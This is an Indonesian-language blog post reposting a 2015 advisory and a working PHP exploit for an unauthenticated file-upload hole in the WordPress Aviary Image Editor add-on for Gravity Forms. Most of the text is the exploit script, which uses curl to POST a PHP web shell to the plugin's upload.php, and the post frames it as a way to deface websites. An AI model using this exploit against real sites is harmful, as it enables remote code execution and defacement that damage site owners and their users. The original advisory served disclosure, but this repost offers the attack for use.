Kali ini ane mau share Exploit WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, langsung saja yuk :D
= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
Exploit Code :
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-
for-gravity-forms/includes/
upload.php';
$file_name_with_full_path = '/var/www/nameshell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
Sekaian dan Terima Kasih,
Wassalamualaikum wr.wb
Cara Deface Dengan Aviary Imaege Editor
Deface Dengan WP Aviary Image Editor